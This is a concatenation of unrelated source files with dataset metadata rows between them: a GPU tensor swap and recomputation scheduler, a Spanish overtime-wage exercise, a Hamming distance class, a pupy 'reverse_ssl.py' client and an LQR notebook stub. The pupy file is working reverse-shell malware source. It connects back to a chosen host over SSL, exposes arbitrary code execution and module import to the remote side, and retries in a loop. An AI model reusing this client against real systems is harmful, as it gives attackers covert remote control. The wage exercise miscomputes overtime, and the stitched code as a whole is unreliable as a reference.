not_occupied_intervals.insert(i + 1, (access.end_time, end))
i += 1
j += 1
elif start == access.start_time < end < access.end_time:
not_occupied_intervals.pop(i)
j += 1
elif access.start_time <= start < access.end_time < end:
not_occupied_intervals[i] = (access.end_time, end)
j += 1
elif access.start_time <= start < end <= access.end_time:
not_occupied_intervals.pop(i)
else:
j += 1
# 按照区间终点排序
if not asc:
not_occupied_intervals = sorted(not_occupied_intervals, key=lambda x: x[key], reverse=not asc)
return not_occupied_intervals
def generate_swap_recomputation_release_order(tensor_access_by_tensor, swap_scheduler, recomputations, job_num):
swap_orders = defaultdict(list)
release_orders = defaultdict(list)
recomp_orders = defaultdict(list)
for job_id in range(job_num):
# 按id排序
tensor_accesses = sorted([i for tmp in tensor_access_by_tensor[job_id].values() for i in tmp], key=lambda x: x.tensor.tensor_id)
# 按起始时间排序
swap_tasks = sorted(swap_scheduler[job_id], key=lambda x: x.start_time)
for i in range(len(swap_tasks)):
swap_tasks[i].swap_task_id = i
releases = []
swaps = []
recomps = []
for access in tensor_accesses:
if access.release_flag:
releases.append((access.operation_id, access.tensor.tensor_id))
release_orders[job_id] = releases
for access in recomputations:
recomps.append((access.operation_id, access.tensor.tensor_id, access.release_for_recomputation))
recomp_orders[job_id] = recomps
for task in swap_tasks:
# if task.task_type==TaskType.swap_out:
# (task_id, node_id(tensor_id), start_time, start_node, move_to_gpu, start_node_type)
ref = task.execute_ref.operation_id
swaps.append([task.tensor.tensor_id, task.execute_time, ref, 0 if task.task_type == TaskType.swap_out else 1, 1, task.start_time])
swap_orders[job_id] = list(map(lambda x: x[:-1], sorted(swaps, key=lambda x: x[-1])))
return release_orders, swap_orders, recomp_orders
def draw_all_task(tensor_access_by_tensor, swap_scheduler, job_num):
for job_id in range(job_num):
tmp = list(tensor_access_by_tensor[job_id].values())
res = []
for sub_list in tmp:
res.extend(sub_list)
draw(sorted(res, key=lambda x: x.start_time), swap_scheduler[job_id])
class MemoryAnalyzer:
def __init__(self, tensor_access_list, tensors):
self.tensor_access_list = tensor_access_list
self.tensors = tensors
self.next_swap_tasks_index = 0
def insert_sort(self, list_with_order: list, list_b: list, cmp):
# 升序
for obj_b in list_b:
i = 0
mid = 0
j = len(list_with_order) - 1
while i < j:
mid = (i + j) // 2
obj_mid = list_with_order[mid]
flag = cmp(obj_mid, obj_b)
if flag == -1:
# mid<b
if mid == i:
# i=mid<=j, mid<b, 比较b和j
flag2 = cmp(list_with_order[j], obj_b)
if flag2 == -1:
# i=mid<=j<b, 插入位置在j+1
mid = j
elif flag2 == 1:
# i=mid<b<j, 插入位置在j
mid = j - 1
else:
# i=mid<=j=b, 插入位置在j+1
mid = j
break
i = mid
elif flag == 1:
# b<mid
if mid == j:
# i<=mid=j, b<mid, 比较i和b
flag2 = cmp(list_with_order[i], obj_b)
if flag2 == -1:
# i<b<mid=j, 插入位置在i+1
mid = i
elif flag2 == 1:
# b<i<mid=j, 插入位置在i
mid = i - 1
else:
# i=b<mid=j, 插入位置在i+1
mid = i
break
j = mid
elif flag == 0:
# b==mid,插入位置在mid+1
break
list_with_order.insert(mid + 1, obj_b)
return list_with_order
def custom_cmp(self, x, y):
if x.time < y.time:
return -1
elif x.time > y.time:
return 1
else:
if x.start_time < y.start_time:
return -1
elif x.start_time > y.start_time:
return 1
else:
# if isinstance(x,TensorAccess) and isinstance(y, SwapTask):
# return 1
# elif isinstance(x, SwapTask) and isinstance(y, TensorAccess):
# return -1
return 0
def custom_cmp_end_time(self, x, y):
if x.end_time < y.end_time:
return -1
elif x.end_time > y.end_time:
return 1
else:
return 0
def get_max_memory_used(self, swap_tasks, swapped_out_tensor):
delta = len(swap_tasks)
if self.next_swap_tasks_index == 0:
# 初始化时间轴
tmp = copy.copy(self.tensor_access_list)
tmp.extend(swap_tasks)
self.time_axis = sorted(tmp, key=cmp_to_key(self.custom_cmp))
self.end_time_axis = sorted(copy.copy(tmp), key=cmp_to_key(self.custom_cmp_end_time))
# self.last_unused_swap_tasks = copy.copy(swap_tasks)
else:
# 更新时间轴
# assert swap_tasks[:self.next_swap_tasks_index] == self.last_unused_swap_tasks
# self.last_unused_swap_tasks = copy.copy(swap_tasks)
swap_tasks = swap_tasks[self.next_swap_tasks_index:]
self.time_axis = self.insert_sort(self.time_axis, swap_tasks, self.custom_cmp)
self.end_time_axis = self.insert_sort(self.end_time_axis, swap_tasks, self.custom_cmp_end_time)
self.index_of_end_time_axis = {self.end_time_axis[i]: i for i in range(len(self.end_time_axis))}
# 计算显存开销
# occupied by handle, cudnn, cuda stream and cudart
memory_used = 0
max_memory_actual = float('-inf')
in_gpu_tensors = set()
max_memory_tensors = set()
last_input_tensor_access = None
max_last_access = None
wait_to_be_released = []
max_time = None
# foot_print = {}
# 首先把输入的x,y以及所有没被swap out的参数载入显存,因为他们从上轮迭代结束时就一直在显存里面
for tensor in self.tensors:
if tensor.in_gpu_at_beginning and tensor not in swapped_out_tensor:
in_gpu_tensors.add(tensor)
memory_used += tensor.size
for time_index, event in enumerate(self.time_axis):
i = len(wait_to_be_released) - 1
while i >= 0:
access = wait_to_be_released[i]
# 如果此刻时间已经过了释放时间,则释放该访问的附带影响
if event.time >= access.end_time:
wait_to_be_released.pop(i)
memory_used -= access.tensor.size
in_gpu_tensors.remove(access.tensor)
i -= 1
if isinstance(event, TensorAccess):
if event.access_type == AccessType.output:
if event.tensor not in in_gpu_tensors:
# 新参数不额外占用空间
if event.operation_name not in optimizer_op:
memory_used += event.tensor.size
in_gpu_tensors.add(event.tensor)
else:
# 用完即释放的
# input本身并不增加gpu使用,swap in增加
if event.release_flag:
wait_to_be_released.append(event)
else:
last_input_tensor_access = event
elif isinstance(event, SwapTask):
# 使用按照结束时间排序的时间轴进行倒序查找
last_event = None
# idx = end_time_axis.index(event)
idx = self.index_of_end_time_axis[event]
for j in range(idx - 1, -1, -1):
if isinstance(self.end_time_axis[j], TensorAccess) and self.end_time_axis[j].end_time <= event.start_time:
last_event = self.end_time_axis[j]
break
if last_event is None:
last_event = self.tensor_access_list[0]
event.execute_ref = last_event
event.execute_time = event.start_time - last_event.end_time
if event.task_type == TaskType.swap_in:
memory_used += event.tensor.size
in_gpu_tensors.add(event.tensor)
else:
memory_used -= event.tensor.size
in_gpu_tensors.remove(event.tensor)
# foot_print[time] = memory_used
if memory_used > max_memory_actual:
# max_memory_actual与是否有考虑价值无关,单纯计量峰值
max_memory_actual = memory_used
max_memory_tensors = copy.copy(in_gpu_tensors)
max_last_access = last_input_tensor_access
max_time = event.time
self.next_swap_tasks_index = delta
return max_memory_actual, max_memory_tensors, max_last_access, max_time, self.time_axis
def run_global_memory_analysis(swap_tasks, swapped_out_tensor):
global job_num
global global_memory_analyzer
max_memory = 0
max_memory_tensors = []
last_input_accesses = []
max_time = []
# foot_prints = []
time_axis = []
for job_id in range(job_num):
job_max_memory, job_max_memory_tensors, last_input_access, now_time, t_axis = global_memory_analyzer[job_id].get_max_memory_used(swap_tasks[job_id], swapped_out_tensor)
time_axis.append(t_axis)
# foot_prints.append(foot_print)
max_memory_tensors.extend(job_max_memory_tensors)
last_input_accesses.append(last_input_access)
max_time.append(now_time)
max_memory += job_max_memory
return max_memory, max_memory_tensors, last_input_accesses, max_time, time_axis
def draw(tensor_access_list, swap_schedule):
df = []
id_color = {'OTA': 'rgb(255, 0, 102)', 'ITA': 'rgb(68, 114, 196)', 'Swap In': 'rgb(237, 137, 69)', 'Swap Out': 'rgb(112, 173, 71)'}
for tensor_access in tensor_access_list:
# input 蓝色,output红色
df.append(dict(Task=f'tensor_id:{tensor_access.tensor.tensor_id}, size:{tensor_access.tensor.size}', Start=tensor_access.start_time, Finish=tensor_access.end_time,
Resource='OTA' if tensor_access.access_type == AccessType.output else 'ITA'))
for task in swap_schedule:
df.append(dict(Task=f'tensor_id:{task.tensor.tensor_id}, size:{task.tensor.size}', Start=task.start_time, Finish=task.end_time, Resource='Swap In' if task.task_type == TaskType.swap_in else 'Swap Out'))
fig = ff.create_gantt(df, colors=id_color, index_col='Resource', group_tasks=True, show_colorbar=True, showgrid_x=True, showgrid_y=True, title=f'ratio={ratio}')
fig['layout']['xaxis'].update({'type': None})
fig.update_layout(
height=900,
width=1600,
)
pyplt(fig, filename=f'../../pic/job{tensor_access_list[0].tensor.job_id}.html', auto_open=True)
def try_swap_in(swap_in_task: SwapTask, swap_scheduler, access_of_target_tensor):
# swap_in越晚越好,按结束时间降序排序
free_intervals = get_free_intervals(swap_in_task, swap_scheduler[swap_in_task.tensor.job_id], access_of_target_tensor, 1, asc=False)
succeed = False
for interval in free_intervals:
if interval[1] - interval[0] >= swap_in_task.time_cost:
swap_in_task.end_time = interval[1]
swap_in_task.start_time = swap_in_task.end_time - swap_in_task.time_cost
swap_scheduler[swap_in_task.tensor.job_id].append(swap_in_task)
succeed = True
break
if not succeed:
return False
else:
return True
def can_next_input_access_swap_in(i, all_access_of_tensor, swap_out_task, swap_scheduler):
# 至少将第一个访问swap in才算成功,后续的能换入的话,则把前一个的release_flag设为True
access = all_access_of_tensor[i]
swap_in_task = SwapTask(access.tensor, access.time, access.tensor.swap_time, TaskType.swap_in,
front_boundary=swap_out_task.end_time if swap_out_task.end_time > all_access_of_tensor[i - 1].end_time else all_access_of_tensor[i - 1].end_time,
back_boundary=access.time)
return try_swap_in(swap_in_task, swap_scheduler, tensor_access_by_tensor[swap_in_task.tensor.job_id][swap_in_task.tensor])
def get_framework_info(info, logged_time, job_id):
global global_tensors
tensors = {}
tensor_access_list = []
global_time = 0
parameter = []
# tensor_id: execution time of operator which generate the tensor
operator_execution_time = []
# for output_tensor_id, input_tensor_id, output_tensor_size, operation_name, is_parameter, shape, inputs_of_model in info:
for tensor_info, input_tensor_id, operation_name, operation_id, is_parameter, inputs_of_model, _ in info:
# is_parameter: 生成的张量是否为参数
# 输入的为Byte
# 转换为MB
input_tensors = []
for tensor_id in input_tensor_id:
input_tensor = tensors[tensor_id]
input_tensors.append(input_tensor)
time_cost = get_predicted_execution_time(operation_name, inputs_of_model, logged_time[operation_id])
for output_tensor_id, output_tensor_size, shape in tensor_info:
output_tensor_size = output_tensor_size / 1000000
operator_execution_time.append(time_cost)
if operation_name in optimizer_op:
is_parameter = 1
output_tensor = Tensor(tensor_id=output_tensor_id, job_id=job_id, size=output_tensor_size, source_tensors=input_tensors, recomputation_time=time_cost, is_parameter=is_parameter, shape=shape)
output_access = TensorAccess(tensor=output_tensor, time=global_time + time_cost, run_time=time_cost, access_type=AccessType.output, operation_id=operation_id, operation_name=operation_name)
tensor_access_list.append(output_access)
tensors[output_tensor.tensor_id] = output_tensor
if is_parameter:
parameter.append(output_tensor)
for tensor_id in input_tensor_id:
input_tensor = tensors[tensor_id]
input_access = TensorAccess(tensor=input_tensor, time=global_time, run_time=time_cost, access_type=AccessType.input, operation_id=operation_id, operation_name=operation_name)
tensor_access_list.append(input_access)
global_time += time_cost
tensors = list(tensors.values())
global_tensors[job_id] = tensors
tensor_access_list = sorted(tensor_access_list, key=lambda x: x.time)
dic = defaultdict(list)
for access in tensor_access_list:
dic[access.tensor].append(access)
for k, v in dic.items():
dic[k] = sorted(v, key=lambda x: x.time)
tensor_access_by_tensor[job_id] = dic
swap_scheduler = []
# 对参数进行swap in调度
# earliest_swap = None
# earliest_time = float('inf')
# 从最早的参数开始安排
parameter = sorted(parameter, key=lambda x: dic[x][0].start_time)
return tensor_access_list, swap_scheduler, parameter, operator_execution_time
# 随机生成数据用的参数
times = 150
tensors = 50
time_scale = times
ratio = 1
# 全局变量
job_num = 0
global_tensor_access = [[]]
tensor_access_by_tensor = []
weight = 1
jobs_weights = []
# jobs_weight = [1, 1, 1, 1, 1]
total_memory = 0
enable_recomputation = True
global_graphs = []
global_tensors = {}
swap_scheduler = []
parameters = []
models = {}
global_memory_analyzer = []
# load_all_model()
def init(logged_times: list, gpu: int):
global job_num
global global_tensor_access
global tensor_access_by_tensor
global total_memory
global handle
global jobs_weights
global global_graphs
global global_tensors
global swap_scheduler
global parameters
global global_memory_analyzer
global_tensor_access = [[]]
tensor_access_by_tensor = []
global_tensors = {}
swap_scheduler = []
parameters = []
global_memory_analyzer = []
graphs = global_graphs
jobs_weights = [weight for _ in range(len(graphs))]
tensor_access_by_tensor = [[] for _ in range(job_num)]
# 获取当前剩余显存总量
if not debug_mod:
nvmlInit()
handle = nvmlDeviceGetHandleByIndex(gpu)
total_memory = nvmlDeviceGetMemoryInfo(handle).free / 1000000
else:
total_memory = 6000
job_num = len(graphs)
tmp = [get_framework_info(graphs[i], logged_times[i], i) for i in range(job_num)]
global_tensor_access = [tmp[i][0] for i in range(job_num)]
swap_scheduler = [tmp[i][1] for i in range(job_num)]
parameters = [tmp[i][2] for i in range(job_num)]
for i in range(job_num):
global_memory_analyzer.append(MemoryAnalyzer(global_tensor_access[i], global_tensors[i]))
def add_job(graph, job_id, gpu: int):
global global_graphs
assert job_id == len(global_graphs) or global_graphs[job_id] is None
if job_id == len(global_graphs):
global_graphs.append(graph)
else:
global_graphs[job_id] = graph
init([[] for _ in range(job_num)], gpu)
def remove_job(job_id, gpu: int):
global global_graphs
global_graphs[job_id] = None
init([], gpu)
def generate_scheduling_plan(logged_times, gpu: int):
# 如果是此时logged_times已经清空,则
# logged_times: [[(operation_id, [time, time, time])]],外层索引为job_id
global total_memory
global global_tensors
init(logged_times, gpu)
# 指数加权平均更新估计时间
tensor_nums = list(map(lambda x: len(x), tensor_access_by_tensor))
swap_out_number_limits = [int(weight * tensor_num) for weight, tensor_num in zip(jobs_weights, tensor_nums)]
swap_out_number = [0 for _ in tensor_nums]
swapped_out_tensor = set()
swapped_in_source_tensor = set()
swap_out_dict = {}
swapped_in_access = set()
recomputations = []
recomputation_tensor = set()
# key:tensor,value:[所有释放这个张量的重计算对应的在recomputations中的index]
# 上一轮没有成功的swap_out时为False
swapped_flag = True
recomputation_flag = True
iter = 0
original_memory_used = 0
last_memory_used = 0
job_id_ordered_by_weights = list(map(lambda x: x[0], sorted([(job_id, weights) for job_id, weights in enumerate(jobs_weights)], key=lambda x: x[1], reverse=True)))
max_memory_footprint = []
# draw_all_task(tensor_access_by_tensor, swap_scheduler, job_num)
while swapped_flag or (recomputation_flag and enable_recomputation):
# MB
if not debug_mod:
total_memory = nvmlDeviceGetMemoryInfo(handle).free / 1000000
else:
total_memory = 6000
max_memory, max_tensors, last_input_accesses, max_time, time_axis = run_global_memory_analysis(swap_scheduler, swapped_out_tensor)
max_memory_footprint.append(max_memory)
# 最后三次迭代的峰值,做一阶差分,结果的最大值大于上一次峰值的0.05%以上或迭代次数小于100轮才继续~`
if len(max_memory_footprint) > 3 and max([max_memory_footprint[i] - max_memory_footprint[i + 1] for i in range(len(max_memory_footprint) - 3, len(max_memory_footprint) - 1)]) < max_memory_footprint[
-1] * 0.0005 and iter > 100:
break
if iter == 0:
original_memory_used = max_memory
liveness_analysis(global_tensor_access)
else:
last_memory_used = max_memory
# print(f'iter:{iter}, max_memory:{max_memory}')
max_tensors = sorted(max_tensors, key=lambda x: x.size, reverse=True)
if swapped_flag:
swapped_flag = False
for tensor in max_tensors:
# 对该张量进行swap_out计划的安排
is_new_parameter = tensor.is_parameter and tensor_access_by_tensor[tensor.job_id][tensor][0].operation_name in optimizer_op and len(tensor_access_by_tensor[tensor.job_id][tensor]) == 1
if not is_new_parameter:
if swap_out_number[tensor.job_id] <= swap_out_number_limits[tensor.job_id] and len(tensor_access_by_tensor[tensor.job_id][tensor]) > 1:
# swapped_out表示所有可能的swap_in已经调度过了
if tensor not in swapped_out_tensor:
all_access_of_tensor = tensor_access_by_tensor[tensor.job_id][tensor][1:]
# 首先确定swap_out的时间范围,最迟不能超过此时此刻,最早不能超过第一次访问结束时刻
output_access = tensor_access_by_tensor[tensor.job_id][tensor][0]
assert output_access.access_type == AccessType.output
if last_input_accesses[tensor.job_id] is not None:
# 此时此刻
back_boundary = last_input_accesses[tensor.job_id].time
else:
last_time_access = tensor_access_by_tensor[tensor.job_id][tensor][-1]
back_boundary = last_time_access.time + tensor.swap_time
succeed = False
front_boundary = output_access.time
# failed_input_access = []
swap_out_succeed = True
have_next_ITA = True
# 如果是因为swap out放不下,则不用继续更新可行区间了,直接break
while not succeed and front_boundary < back_boundary and swap_out_succeed and have_next_ITA:
swap_out_task = SwapTask(tensor, output_access.time, tensor.swap_time, TaskType.swap_out, front_boundary=front_boundary, back_boundary=back_boundary)
free_intervals = get_free_intervals(swap_out_task, swap_scheduler[swap_out_task.tensor.job_id], tensor_access_by_tensor[tensor.job_id][tensor])
selected_first_access_index = None
# 选出能容纳该任务的剩余空间
swap_out_succeed = False
have_next_ITA = False
for interval in free_intervals:
if interval[1] - interval[0] >= swap_out_task.time_cost:
swap_out_succeed = True
swap_out_task.start_time = interval[0]
swap_out_task.end_time = swap_out_task.start_time + swap_out_task.time_cost
swap_scheduler[swap_out_task.tensor.job_id].append(swap_out_task)
# 看一下后面第一个swap_in能否放下
for i, access in enumerate(all_access_of_tensor):
# 找到后面第一个访问
if access.start_time >= swap_out_task.end_time:
have_next_ITA = True
if can_next_input_access_swap_in(i, all_access_of_tensor, swap_out_task, swap_scheduler):
swapped_out_tensor.add(tensor)
swap_out_dict[tensor] = swap_out_task
swapped_in_access.add(access)
swap_out_number[tensor.job_id] += 1
selected_first_access_index = i
succeed = True
swapped_flag = True
else:
# failed_input_access.append(access)
swap_scheduler[swap_out_task.tensor.job_id].remove(swap_out_task)
# 修正swap_out_task前向限制为这个失败的input_access的结束时间
front_boundary = access.end_time
assert tensor not in swapped_out_tensor
# swapped_out_tensor.remove(tensor)
break
if not succeed:
if swap_out_task in swap_scheduler[swap_out_task.tensor.job_id]:
swap_scheduler[swap_out_task.tensor.job_id].remove(swap_out_task)
# 如果不是因为swap out没安排下则重新生成区间
break
else:
break
# 安排失败
if not succeed:
continue
if not is_new_parameter:
# 后续的能换入的话,则把前一个的release_flag设为True
for i in range(selected_first_access_index + 1, len(all_access_of_tensor)):
access = all_access_of_tensor[i]
if i == 0 or access in swapped_in_access:
continue
else:
if can_next_input_access_swap_in(i, all_access_of_tensor, swap_out_task, swap_scheduler):
# print(f'成功{access}')
swapped_in_access.add(access)
if all_access_of_tensor[i - 1].start_time > swap_out_task.end_time:
all_access_of_tensor[i - 1].release_flag = True
if swapped_flag:
break
# 如果是新参数,则尝试对新参数进行swap out,对对应的旧参数进行swap in
else:
if tensor not in swapped_out_tensor:
output_access = tensor_access_by_tensor[tensor.job_id][tensor][0]
assert output_access.access_type == AccessType.output
swap_out_task = SwapTask(tensor, time=output_access.time, time_cost=tensor.swap_time, task_type=TaskType.swap_out, front_boundary=output_access.end_time, back_boundary=float('inf'))
free_intervals = get_free_intervals(swap_out_task, swap_scheduler[swap_out_task.tensor.job_id], tensor_access_by_tensor[tensor.job_id][tensor])
for interval in free_intervals:
if interval[1] - interval[0] >= swap_out_task.time_cost:
swap_out_task.start_time = interval[0]
swap_out_task.end_time = swap_out_task.start_time + swap_out_task.time_cost
swap_scheduler[swap_out_task.tensor.job_id].append(swap_out_task)
# 找到对应的旧参数张量
# 由于二者可行域无关,所以直接查看对应的swap in 能否调度
for t in tensor.source_tensors:
if t.is_parameter and t not in swapped_in_source_tensor:
# 试图swap in
# 找到第一次input访问(feed_dict不实际使用)
first_access = tensor_access_by_tensor[t.job_id][t][1]
assert first_access.access_type == AccessType.input
swap_in_task = SwapTask(t, first_access.time, first_access.tensor.swap_time, TaskType.swap_in, front_boundary=0, back_boundary=first_access.start_time)
res = try_swap_in(swap_in_task, swap_scheduler, tensor_access_by_tensor[t.job_id][t])
# assert not res, f'swap in parameter:{t} failed'
if res:
swapped_in_source_tensor.add(t)
swapped_out_tensor.add(tensor)
swap_out_dict[tensor] = swap_out_task
swapped_in_access.add(first_access)
swap_out_number[tensor.job_id] += 1
swapped_flag = True
else:
swap_scheduler[swap_out_task.tensor.job_id].remove(swap_out_task)
assert tensor not in swapped_out_tensor
break
break
elif enable_recomputation:
recomputation_flag = False
# 需要重计算
if max_memory >= total_memory:
for job_id in job_id_ordered_by_weights:
max_tensors_filtered = []
for tensor in max_tensors:
# 张量不是参数,没被逐出过,且他的所有源张量从未被swap或recomputation
if not tensor.is_parameter and tensor not in swapped_out_tensor and tensor.source_tensors is not None and len(tensor.source_tensors) > 0 and \
False not in [t not in swapped_out_tensor for t in tensor.source_tensors] and False not in [t not in recomputations for t in tensor.source_tensors]:
max_tensors_filtered.append(tensor)
if len(max_tensors_filtered) == 0:
continue
max_tensors_by_metric = sorted(max_tensors_filtered, key=lambda x: x.recomputation_metric, reverse=True)
# 选取metric最大的张量
tensor = max_tensors_by_metric[0]
# 找到此刻对应的下一个访问
now_time = max_time[job_id]
all_access_of_tensor = tensor_access_by_tensor[tensor.job_id][tensor]
for i, access in enumerate(all_access_of_tensor):
if access.access_type == AccessType.input and access not in recomputations:
if access.start_time >= now_time:
for source_tensor in access.tensor.source_tensors:
accesses = tensor_access_by_tensor[source_tensor.job_id][source_tensor]
for temp_acc in accesses:
# 确保source被release过的不进行重计算
if temp_acc.release_flag and temp_acc.end_time <= access.start_time:
break
else:
recomputations.append(access)
all_access_of_tensor[i - 1].release_flag = True
recomputation_flag = True
recomputation_tensor.add(access.tensor)
break
break
iter += 1
# fig = go.Figure(data=[go.Scatter(x=list(original_memory_footprint[0].keys()), y=list(original_memory_footprint[0].values())), go.Scatter(x=list(foot_prints[0].keys()), y=list(foot_prints[0].values()))])
# plotly.offline.plot(fig, filename='../../pic/footprint.html')
# if not debug_mod:
# total_memory = nvmlDeviceGetMemoryInfo(handle).free / 1000000
# else:
# total_memory = 6000
# stats = 'succeed' if max_memory < total_memory else ' failure'
# print(f'scheduling {stats}')
# draw_all_task(tensor_access_by_tensor, swap_scheduler, job_num)
memory_saved_ratio = format((1 - last_memory_used / original_memory_used) * 100, '.2f')
print(f'memory_saved_ratio:{memory_saved_ratio}%')
print(f'swap ratio:{len(swap_scheduler[0]) / len(global_tensors)}')
# print(f'recomputations:{recomputations}')
return generate_swap_recomputation_release_order(tensor_access_by_tensor, swap_scheduler, recomputations, job_num)
def multiprocess_init(global_message_queue: multiprocessing.Queue, global_control_queue: multiprocessing.Queue, total_job_number):
# swap_order = [(20, 0, 20, 0)]
# control_messages = []
# control_message = [swap_order, [], []]
# control_messages.append(control_message)
# global_control_queue.put(control_messages)
logged_times = []
log_repeat = 0
alpha = 0.9
second_schedule_finished = False
# todo 设置从executor到algorithm的job_id的映射
map_out_to_in = {}
map_in_to_out = {}
global job_num
job_num = 0
while True:
if not global_message_queue.empty():
global_message = global_message_queue.get()
job_id = global_message[0]
message_type = global_message[1][0]
message_graph = global_message[1][1]
if message_type == 0:
# print("job_id =", job_id)
job_num += 1
map_out_to_in[job_id] = job_num - 1
map_in_to_out[job_num - 1] = job_id
job_id_in = job_num - 1
logged_times.append([])
global_graphs.append(message_graph)
tensor_num = len(message_graph)
# with open("../../global_graphs", "wb") as f1:
# pickle.dump(global_graphs, f1)
for i in range(tensor_num):
# print(message_graph[i][6])
logged_times[job_id_in].append([message_graph[i][6]])
s = time.time()
if job_num == total_job_number:
release_order, swap_order, recomputation_order = generate_scheduling_plan(logged_times, 0)
print(f'time:{time.time() - s}')
control_messages = {}
for i in range(job_num):
# print(swap_order)
control_message = [swap_order[i], release_order[i], recomputation_order[i]]
control_messages[map_in_to_out[i]] = control_message
global_control_queue.put(control_messages)
else:
job_id_in = map_out_to_in[job_id]
total_time_old = 0
for run_time in logged_times[job_id_in]:
total_time_old += run_time[0]
total_time_new = 0
for run_time in message_graph:
total_time_new += run_time[1]
change_rate = abs(total_time_new - total_time_old) / total_time_old
print("change rate is ", change_rate)
# print("total time new is", total_time_new)
# print("total time old is", total_time_old)
if change_rate > 0.3:
is_replan = True
else:
is_replan = False
# with open("./log/total_time.txt", "a") as f1:
# print(total_time_new, file=f1)
# todo 此处控制了在一定轮数之后才进行决策
log_repeat += 1
if log_repeat > 0 and (is_replan or (not second_schedule_finished)):
second_schedule_finished = True
# with open("../../logged_times", "wb") as f1:
# pickle.dump(logged_times, f1)
for node_message in message_graph:
time_new = node_message[1] * alpha + logged_times[job_id_in][node_message[0]][0] * (1 - alpha)
logged_times[job_id_in][node_message[0]] = [time_new]
release_order, swap_order, recomputation_order = generate_scheduling_plan(logged_times, 0)
print(logged_times)
control_messages = {}
for i in range(job_num):
print(swap_order)
control_message = [swap_order[i], release_order[i], recomputation_order[i]]
control_messages[map_in_to_out[i]] = control_message
global_control_queue.put(control_messages)
# print(logged_times[0])
if debug_mod and __name__ == '__main__':
import pickle
with open('../../global_graphs', 'rb') as f:
g = pickle.load(f)
global_graphs = g
with open('../../logged_times', 'rb') as f:
logged_times = pickle.load(f)
job_num = 1
# profiler = LineProfiler()
# profiler.add_function(get_free_intervals)
# # profiler.add_function(get_occupied_intervals)
# # profiler.add_function(MemoryAnalyzer.get_max_memory_used)
# # profiler.add_function(run_global_memory_analysis)
# profiler_wrapper = profiler(generate_scheduling_plan)
# res = profiler_wrapper(logged_times, 0)
# profiler.print_stats()
release_order, swap_order, recomputation_order = generate_scheduling_plan(logged_times, 0)
| 45.999041 | 229 | 0.59318 | [
"MIT"
] | GIS-PuppetMaster/TENSILE | pycode/tinyflow/Scheduler.py | 49,665 | Python |
horasextra = int(input("¿Cuantas horas extra has trabajado? "))
horas = horasextra + 35 #elminimo
extra = 0
sueldo = 0
class trabajo:
def __init__(self, horasextra, horas, extra, sueldo): #defino el constructor
self.horasextra = horasextra
self.horas = horas
self.extra = extra
self.sueldo = sueldo
def horas_totales(self):
if 36 < self.horas < 43:
self.extra = float(self.horas*17) * 1.25
self.sueldo = (35 * 17) + self.extra
print("Ha trabajado: ",horasextra,"horas extra y su sueldo es: ",self.sueldo, "€ ya que ha trabajado en total: ",self.horas,"horas")
if self.horas >= 44:
self.extra = float(self.horas*17) * 1.50
self.sueldo = (35*17) + self.extra
print("Ha trabajado: ",horasextra,"horas extra y su sueldo es: ",self.sueldo,"€ ya que ha trabajado en total: ",self.horas,"horas")
resultado = trabajo(horasextra, horas, extra, sueldo)
print(resultado.horas_totales()) | 43.208333 | 144 | 0.60945 | [
"Apache-2.0"
] | joseluis031/Introducci-n-a-la-algor-tmica | ej11.py | 1,042 | Python |
class Hamming:
def distance(self, gene1, gene2):
if type(gene1) != str or type(gene2) != str:
return "Genes have to be strings"
if len(gene1) != len(gene2):
return "Genes have to have same lenghts"
diff = 0
for i in range(0, len(gene1)):
if gene1[i] != gene2[i]:
diff += 1
return diff | 34.545455 | 52 | 0.513158 | [
"MIT"
] | TestowanieAutomatyczneUG/laboratorium-7-wgulan | src/sample/Hamming.py | 380 | Python |
#!/usr/bin/env python
# -*- coding: UTF8 -*-
import site
import sys
import time
import rpyc
from rpyc.core.service import Service, ModuleNamespace
from rpyc.lib.compat import execute, is_py3k
import threading
import weakref
import traceback
import os
import subprocess
import threading
import multiprocessing
import logging
import StringIO
import json
import urllib2
import urllib
import platform
import re
import ssl
import random
import imp
class ReverseSlaveService(Service):
""" Pupy reverse shell rpyc service """
__slots__=["exposed_namespace"]
def on_connect(self):
self.exposed_namespace = {}
self._conn._config.update(dict(
allow_all_attrs = True,
allow_public_attrs = True,
allow_pickle = True,
allow_getattr = True,
allow_setattr = True,
allow_delattr = True,
import_custom_exceptions = False,
propagate_SystemExit_locally=False,
propagate_KeyboardInterrupt_locally=True,
instantiate_custom_exceptions = True,
instantiate_oldstyle_exceptions = True,
))
# shortcuts
self._conn.root.set_modules(ModuleNamespace(self.exposed_getmodule))
def exposed_exit(self):
raise KeyboardInterrupt
def exposed_execute(self, text):
"""execute arbitrary code (using ``exec``)"""
execute(text, self.exposed_namespace)
def exposed_eval(self, text):
"""evaluate arbitrary code (using ``eval``)"""
return eval(text, self.exposed_namespace)
def exposed_getmodule(self, name):
"""imports an arbitrary module"""
return __import__(name, None, None, "*")
def exposed_getconn(self):
"""returns the local connection instance to the other side"""
return self._conn
def get_next_wait(attempt):
return 0.5
if attempt<60:
return 0.5
else:
return random.randint(15,30)
def add_pseudo_pupy_module(HOST):
if not "pupy" in sys.modules:
mod = imp.new_module("pupy")
mod.__name__="pupy"
mod.__file__="<memimport>\\\\pupy"
mod.__package__="pupy"
sys.modules["pupy"]=mod
mod.get_connect_back_host=(lambda : HOST)
mod.pseudo=True
def main():
HOST="127.0.0.1:443"
if "windows" in platform.system().lower():
try:
import pupy
HOST=pupy.get_connect_back_host()
except ImportError:
print "Warning : ImportError: pupy builtin module not found ! please start pupy from either it's exe stub or it's reflective DLL"
else:
if len(sys.argv)!=2:
exit("usage: %s host:port"%sys.argv[0])
HOST=sys.argv[1]
add_pseudo_pupy_module(HOST)
attempt=0
while True:
try:
rhost,rport=None,None
tab=HOST.rsplit(":",1)
rhost=tab[0]
if len(tab)==2:
rport=int(tab[1])
else:
rport=443
print "connecting to %s:%s"%(rhost,rport)
conn=rpyc.ssl_connect(rhost, rport, service = ReverseSlaveService)
while True:
attempt=0
conn.serve()
except KeyboardInterrupt:
print "keyboard interrupt received !"
break
except Exception as e:
time.sleep(get_next_wait(attempt))
attempt+=1
if __name__=="__main__":
main()
| 24.375 | 132 | 0.730598 | [
"BSD-3-Clause"
] | wrtcoder/pupy | client/reverse_ssl.py | 2,925 | Python |
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.2.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import sys
print(sys.path)
sys.path.append("../lqr")
from lqr_recursion import LqrRecursion
import chainer
import numpy as np
import matplotlib.pyplot as plt
T =51
f = None
n_state =3
n_ctrl =1
n_sc = n_ctrl +n_state
